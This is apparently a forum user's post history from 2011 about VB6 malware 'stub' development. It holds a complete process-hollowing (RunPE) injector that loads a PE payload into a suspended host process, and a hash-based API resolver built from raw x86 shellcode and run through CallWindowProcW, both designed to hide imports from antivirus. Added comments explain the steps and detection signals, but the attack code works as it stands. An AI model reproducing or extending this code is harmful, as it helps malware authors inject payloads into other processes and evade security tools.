

  Mostrar Mensajes
61  Programación / Programación Visual Basic / Re: [HELP] Invoke InternetReadFile API en: 6 Noviembre 2011, 23:55 pm
@BlackZeroX (Astaroth)
Thanks a lot man!
62  Programación / Programación Visual Basic / Re: [HELP] Invoke InternetReadFile API en: 6 Noviembre 2011, 23:21 pm
Modded CallAPIByName by cobein.
63  Programación / Programación Visual Basic / Re: [HELP] Invoke InternetReadFile API en: 6 Noviembre 2011, 22:44 pm
Thanks for your answer, man, but that's not what I want. I want to invoke the API using CallAPIByName.
64  Programación / Programación Visual Basic / [HELP] Invoke InternetReadFile API en: 6 Noviembre 2011, 22:17 pm
I've tried almost everything to Invoke that API and I always failed...

I succeeded with InternetOpen/InternetOpenUrl/InternetCloseHandle, but not with that one :/

Código:
' NOTE(review): InternetReadFile returns a Win32 BOOL, which is 32 bits wide; VB6 "Integer" is
' 16 bits, so "As Long" is the matching return type for this Declare.
' NOTE(review): lpBuffer is declared ByVal As String, so whatever arrives is treated as text;
' the bytes come from the network and should be handled as untrusted input by the caller.
Private Declare Function InternetReadFile Lib "wininet.dll" (ByVal hFile As Long, ByVal lpBuffer As String, ByVal dwNumberOfBytesToRead As Long, lNumberOfBytesRead As Long) As Integer

        ' Reads up to Len(strArray) bytes from the handle into strArray; the byte count actually
        ' read comes back in lNumberOfBytes and the success flag in bDoLoop.
        bDoLoop = InternetReadFile(hInternetOpen, strArray, Len(strArray), lNumberOfBytes)

Can anyone help please?
65  Programación / Programación Visual Basic / Re: mMemory - WriteProcessMemory/vbaCopyBytes/RtlMoveMemory replacement [NOAPI!!!] en: 6 Noviembre 2011, 02:34 am
Thanks a lot man for your example but how to "Unlock BlockMemory" ?

I'm getting that message...
66  Programación / Programación Visual Basic / Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas en: 1 Noviembre 2011, 19:13 pm
The hashes are the same... Can you post the code you're using? Maybe the problem is with DEP...

I don't know which APIs it's failing with; how can I find out? I have invoked RunPE/Resource and a few APIs in Main:

Main Module:
Código:
'fCallAPI ("KERNEL32"), ("RtlMoveMemory"), VarPtr(bFile(0)), VarPtr(bTemp(10)), UBound(bFile) ---> fCallAPI ("KERNEL32"), (&HCF14E85B), VarPtr(bFile(0)), VarPtr(bTemp(10)), UBound(bFile)
'fCallAPI "kernel32", "GetModuleFileNameW", 0, VarPtr(bBuff(0)), 1024 ---> fCallAPI "kernel32", &h45B06D8C, 0, VarPtr(bBuff(0)), 1024

Resource Module:
Código:
'hRsrc = fCallAPI(("Kernel32"), ("FindResourceW"), hMod, ResName, ResType) ---> hRsrc = fCallAPI(("Kernel32"), (&h3BD09A6B), hMod, ResName, ResType)
'hGlobal = fCallAPI(("Kernel32"), ("LoadResource"), hMod, hRsrc) ---> hGlobal = fCallAPI(("Kernel32"), (&h934E1F7B), hMod, hRsrc)
'lpData = fCallAPI(("Kernel32"), ("LockResource"), hGlobal) ---> lpData = fCallAPI(("Kernel32"), (&h9A4E2F7B), hGlobal)
'Size = fCallAPI(("Kernel32"), ("SizeofResource"), hMod, hRsrc) ---> Size = fCallAPI(("Kernel32"), (&h3F2A9609), hMod, hRsrc)
'fCallAPI ("Kernel32"), ("RtlMoveMemory"), VarPtr(B(0)), lpData, Size ---> fCallAPI ("Kernel32"), (&hCF14E85B), VarPtr(B(0)), lpData, Size
'fCallAPI ("Kernel32"), ("FreeResource"), hGlobal ---> fCallAPI ("Kernel32"), (&h54423F7C), hGlobal
'fCallAPI ("Kernel32"), ("FreeLibrary"), hMod ---> fCallAPI ("Kernel32"), (&h4DC9D5A0), hMod

And all API's in kRunPE:
Código:
' fInjectExe - creates the process named by sHost in a suspended state and replaces its
' mapped image with the PE file held in bvBuff, then resumes it. This is the "RunPE" /
' process-hollowing pattern (MITRE ATT&CK T1055.012).
'
' Parameters:
'   bvBuff   - raw bytes of a PE file (parsed below as a 32-bit image).
'   sHost    - command line of the process to create as the host.
'   sParams  - accepted but never read in this body.
'   hProcess - receives the process handle of the created host.
' Returns: fClngW("1") when the end of the function is reached; 0 (the VB default) when the
'   MZ or PE signature check fails.
'
' NOTE(review): fCallAPI, fClngW and the hash values are defined outside this listing. The
'   comments assume fClngW converts its string to the Long it spells and that each hash
'   resolves to the API named in the author's comment - confirm against the helper module.
' NOTE(review): no fCallAPI return value is checked, so a failed step is not detected and the
'   function still reports success; header fields read from bvBuff are used without bounds
'   checks against the buffer size.
'
' Defender view: the APIs are resolved by numeric hash, so the compiled stub has no import
' entries or name strings for them and static import inspection will not show them. The
' runtime behaviour is still visible: a child created suspended, NtUnmapViewOfSection on it,
' an RWX allocation plus cross-process writes, NtSetContextThread, then NtResumeThread -
' after which the host's in-memory image no longer matches its file on disk.
Public Function fInjectExe(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Long
    Dim hModuleBase             As Long
    Dim hPE                     As Long
    Dim hSec                    As Long
    Dim ImageBase               As Long
    Dim gNumC                       As Long
    ' The Win32 structures are kept as plain Long arrays instead of declared Types:
    ' 17 Longs = 68 bytes (matches the &H44 size stored below), 4 Longs, and 51 Longs.
    Dim tSTARTUPINFO(16)        As Long
    Dim tPROCESS_INFORMATION(3) As Long
    Dim tCONTEXT(50)            As Long
    Dim KERNEL32          As String
    Dim NTDLL             As String

    KERNEL32 = "KERNEL32"
    NTDLL = "NTDLL"

    ' Address of the first byte of the payload buffer in this process.
    hModuleBase = VarPtr(bvBuff(0))

    ' First 2 bytes must be &H5A4D ("MZ").
    If Not GetNumb(hModuleBase, fClngW("2")) = fClngW("&H5A4D") Then Exit Function

    ' Offset &H3C of the DOS header holds the offset of the PE header (e_lfanew).
    hPE = hModuleBase + GetNumb(hModuleBase + fClngW("&H3C"))

    ' PE signature must be &H4550 ("PE").
    If Not GetNumb(hPE) = fClngW("&H4550") Then Exit Function

    ' PE+&H34 is the ImageBase field of a 32-bit (PE32) optional header; the header magic is
    ' not checked, so a PE32+ file would be misparsed.
    ImageBase = GetNumb(hPE + fClngW("&H34"))

    ' First field of STARTUPINFO is its own size (cb).
    tSTARTUPINFO(0) = fClngW("&H44")
   
    'CreateProcessW
    ' The sixth API argument (creation flags) is &H4, i.e. CREATE_SUSPENDED.
    ' tPROCESS_INFORMATION(0) / (1) are used below as the process / thread handle.
    Call fCallAPI(KERNEL32, &H16B3FE88, 0, StrPtr(sHost), 0, 0, 0, fClngW("&H4"), 0, 0, VarPtr(tSTARTUPINFO(0)), VarPtr(tPROCESS_INFORMATION(0)))
   
    'NtUnmapViewOfSection
    ' Unmaps whatever is mapped at the payload's preferred ImageBase in the host.
    Call fCallAPI(NTDLL, &HF21037D0, tPROCESS_INFORMATION(0), ImageBase)

    'NtAllocateVirtualMemory
    ' Size comes from PE+&H50 (SizeOfImage); &H3000 = MEM_COMMIT Or MEM_RESERVE,
    ' &H40 = PAGE_EXECUTE_READWRITE. A remote RWX region is a strong behavioural signal.
    Call fCallAPI(NTDLL, &HD33BCABD, tPROCESS_INFORMATION(0), VarPtr(ImageBase), 0, VarPtr(GetNumb(hPE + fClngW("&H50"))), fClngW("&H3000"), fClngW("&H40"))
   
    'NtWriteVirtualMemory
    ' Copies the headers; length is PE+&H54 (SizeOfHeaders).
    Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase, VarPtr(bvBuff(0)), GetNumb(hPE + fClngW("&H54")), 0)

    ' One write per section. PE+&H6 is NumberOfSections (2 bytes); section headers are taken
    ' to start at PE+&HF8 and be &H28 bytes each, which assumes the standard PE32 header size.
    ' Per section: +&HC = VirtualAddress, +&H14 = PointerToRawData, +&H10 = SizeOfRawData.
    For gNumC = 0 To GetNumb(hPE + fClngW("&H6"), fClngW("2")) - fClngW("1")
        hSec = hPE + fClngW("&HF8") + (fClngW("&H28") * gNumC)
        'NtWriteVirtualMemory
        Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase + GetNumb(hSec + fClngW("&HC")), hModuleBase + GetNumb(hSec + fClngW("&H14")), GetNumb(hSec + fClngW("&H10")), 0)
    Next gNumC

    ' ContextFlags: 65543 = &H10007.
    tCONTEXT(0) = fClngW("65543")

    'NtGetContextThread
    Call fCallAPI(NTDLL, &HE935E393, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
   
    'NtWriteVirtualMemory
    ' tCONTEXT(41) is byte offset &HA4 of the x86 CONTEXT (Ebx); 4 bytes holding the new
    ' ImageBase are written at that address + 8 in the host.
    ' NOTE(review): presumably this is the image-base field of the host's PEB - confirm.
    Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), tCONTEXT(41) + fClngW("&H8"), VarPtr(ImageBase), fClngW("&H4"), fClngW("0"))

    ' tCONTEXT(44) is byte offset &HB0 (Eax); it is set to ImageBase + PE+&H28
    ' (AddressOfEntryPoint), i.e. the payload's entry point.
    tCONTEXT(44) = ImageBase + GetNumb(hPE + fClngW("&H28"))
   
    'NtSetContextThread
    Call fCallAPI(NTDLL, &H6935E395, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
   
    'NtResumeThread
    Call fCallAPI(NTDLL, &HC54A46C8, tPROCESS_INFORMATION(1), 0)

    ' Hand the host's process handle back to the caller; neither handle is closed here.
    hProcess = tPROCESS_INFORMATION(0)
    fInjectExe = fClngW("1")
End Function
' GetNumb - returns the value stored at address lPtr, reading lSize bytes (default 4).
' It works by asking NtWriteVirtualMemory (resolved by hash through fCallAPI) to copy
' lSize bytes from lPtr into this function's own return variable; the handle -1 is the
' current-process pseudo-handle, so the "write" lands in this process.
' NOTE(review): the return variable is a 4-byte Long and lSize is not checked, so a caller
'   passing more than 4 would write past it; lPtr is not validated either.
' Defender view: NtWriteVirtualMemory against the process's own handle used as a plain
' memory copy is unusual and stands in for an imported copy routine.
Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
    'NtWriteVirtualMemory
    Call fCallAPI("NTDLL", &HC5108CC2, -1, VarPtr(GetNumb), lPtr, lSize, 0)
End Function
67  Programación / Programación Visual Basic / Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas en: 1 Noviembre 2011, 17:26 pm
On 64bits maybe the hash would be different, check this with a Debugger or make a program to create Hashes automatically

I have no idea on how to do this... Could you help me doing this please?
68  Programación / Programación Visual Basic / Re: mMemory - WriteProcessMemory/vbaCopyBytes/RtlMoveMemory replacement [NOAPI!!!] en: 1 Noviembre 2011, 17:13 pm
Thanks so much for this, I've tried to use it on your PatchAPI function but I can't get it working :( Could you give us a sample please?
69  Programación / Programación Visual Basic / Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas en: 1 Noviembre 2011, 14:30 pm
Well, if you're taking the Hashes correctly it must work fine... check there's no problem with DEP (Windows) or native/p-code...

Make sure you're generating the hashes using the complete function name, e.g. MessageBoxA

I've generated the hashes correctly using each complete function name, I used the tool you shared with us.

I'm on Windows 7 x64 bits and I'm compiling in Native Code

I never got the CallAPIByHash working, never understood why :/

My Stub was using CallAPIByName and it was working...
70  Programación / Programación Visual Basic / Re: [ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas en: 31 Octubre 2011, 23:58 pm
He hecho una pequeña actualización para un nuevo módulo RunPE en el que estoy trabajando, así que aquí está:
Código
  1. 'Karcrack , 22/07/10
      ' Module-level declarations for Invoke: two 4-byte user types, one API Declare and
      ' two byte buffers that are later executed as machine code.
  2. Option Explicit
      ' DWORD_L and DWORD_B are the same size (one Long vs. four Bytes); SliceLong uses LSet
      ' between them to split a Long into its individual bytes.
  3. Private Type DWORD_L
  4.    D1      As Long
  5. End Type
  6.  
  7. Private Type DWORD_B
  8.    B1      As Byte:    B2      As Byte:   B3      As Byte:    B4      As Byte
  9. End Type
  10.  
  11. 'USER32
      ' The first parameter is declared as a raw Long (lpCode), and Invoke passes it the
      ' address of a byte array: the API is used only as a way to jump to arbitrary code.
      ' Defender view: this is the single Declare in the listing, so it is the one import
      ' left for static analysis to see; CallWindowProcW fed a VarPtr of a byte array is an
      ' indicator of shellcode execution from VB6.
  12. Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpCode As Long, Optional ByVal lParam1 As Long, Optional ByVal lParam2 As Long, Optional ByVal lParam3 As Long, Optional ByVal lParam4 As Long) As Long
  13.  
      ' Set once the resolver bytes have been copied into ASM_gAPIPTR.
  14. Private bInitialized_Inv        As Boolean
      ' 171 bytes: the fixed resolver stub filled in by Invoke on first use.
  15. Private ASM_gAPIPTR(0 To 170)   As Byte
      ' 256 bytes: the call thunk that Invoke rebuilds on every call.
  16. Private ASM_cCODE(0 To 255)     As Byte
  17.  
  18. Private Function Invoke(ByVal sDLL As String, ByVal hHash As Long, ParamArray vParams() As Variant) As Long
      ' Invoke - calls an API identified by (sDLL, hHash) without a Declare for it.
      ' Step 1: run the resolver stub in ASM_gAPIPTR to turn sDLL + hHash into an address.
      ' Step 2: build a small thunk in ASM_cCODE that pushes vParams and calls that address.
      ' Returns the thunk's return value, or -1 when the resolver returns 0. A called API
      ' that itself returns -1 cannot be told apart from that failure value.
      '
      ' NOTE(review): both buffers are ordinary VB byte arrays that get executed; this relies
      '   on that memory being executable. Under enforced DEP it would presumably fault,
      '   which matches the DEP questions raised in the thread - not verifiable from here.
      ' NOTE(review): the thunk buffer is module-level and rewritten on each call, and there
      '   is no explicit check that 5 bytes per parameter plus the 8-byte tail fit in the
      '   256-byte ASM_cCODE array.
      ' Defender view: the resolver bytes below are constants, so the array is a stable
      ' static signature for this module even though no API names appear in the binary.
  19.    Dim vItem                   As Variant
  20.    Dim bsTmp                   As DWORD_B
  21.    Dim lAPI                    As Long
  22.    Dim i                       As Long
  23.    Dim w                       As Long
  24.  
      ' One-time copy of the 171-byte stub into ASM_gAPIPTR; i is reset to 0 afterwards
      ' because it is reused as the write index for the thunk.
      ' NOTE(review): the stub is opaque machine code not annotated by the author; from its
      '   use below it takes the DLL name pointer and the hash and yields an address or 0.
  25.    If Not bInitialized_Inv Then
  26.        For Each vItem In Array(&HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, _
  27.                                &H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3)
  28.            ASM_gAPIPTR(i) = CByte(vItem)
  29.            i = i + 1
  30.        Next vItem
  31.        i = 0
  32.        bInitialized_Inv = True
  33.    End If
  34.  
      ' Execute the resolver: CallWindowProcW jumps to the stub with the DLL name pointer
      ' and the hash as its two arguments; the result is treated as the API address.
  35.    lAPI = CallWindowProcW(VarPtr(ASM_gAPIPTR(0)), StrPtr(sDLL), hHash)
  36.  
  37.    If lAPI Then
      ' Parameters are emitted last-to-first, each as PUSH imm32 (opcode &H68 followed by
      ' the four bytes of CLng(param)), so every argument must fit in a 32-bit Long.
  38.        For w = UBound(vParams) To LBound(vParams) Step -1
  39.            vItem = vParams(w)
  40.            bsTmp = SliceLong(CLng(vItem))
  41.            '// PUSH ADDR
  42.            ASM_cCODE(i) = &H68:            i = i + 1
  43.            ASM_cCODE(i) = bsTmp.B1:        i = i + 1
  44.            ASM_cCODE(i) = bsTmp.B2:        i = i + 1
  45.            ASM_cCODE(i) = bsTmp.B3:        i = i + 1
  46.            ASM_cCODE(i) = bsTmp.B4:        i = i + 1
  47.        Next w
  48.  
      ' Tail of the thunk: load the resolved address, call it, return to CallWindowProcW.
  49.        bsTmp = SliceLong(lAPI)
  50.        '// MOV EAX, ADDR
  51.        ASM_cCODE(i) = &HB8:                i = i + 1
  52.        ASM_cCODE(i) = bsTmp.B1:            i = i + 1
  53.        ASM_cCODE(i) = bsTmp.B2:            i = i + 1
  54.        ASM_cCODE(i) = bsTmp.B3:            i = i + 1
  55.        ASM_cCODE(i) = bsTmp.B4:            i = i + 1
  56.        '// CALL EAX
  57.        ASM_cCODE(i) = &HFF:                i = i + 1
  58.        ASM_cCODE(i) = &HD0:                i = i + 1
  59.        '// RET
  60.        ASM_cCODE(i) = &HC3:                i = i + 1
  61.  
      ' Run the freshly built thunk; its EAX on return becomes Invoke's result.
  62.        Invoke = CallWindowProcW(VarPtr(ASM_cCODE(0)))
  63.    Else
      ' Resolver returned 0: report failure as -1 (the Err.Raise alternative is disabled).
  64.        Invoke = -1
  65.        'Err.Raise -1, , "Bad Hash or wrong DLL"
  66.    End If
  67. End Function
  68.  
  69. Private Function SliceLong(ByVal lLong As Long) As DWORD_B
      ' SliceLong - returns the four bytes of lLong as a DWORD_B (fields B1..B4).
      ' The value is stored in a DWORD_L and LSet copies its raw bytes onto the DWORD_B
      ' result, so B1..B4 follow the in-memory byte order of the Long.
  70.    Dim tL                      As DWORD_L
  71.  
  72.    tL.D1 = lLong
  73.    LSet SliceLong = tL
  74. End Function
  75.  

Saludos ;)

Thanks a lot for that code Karcrack, I tried to replace my call api by name by this one, I converted all api names to hash but then my stub gets broken. Is there anything else that has to be done?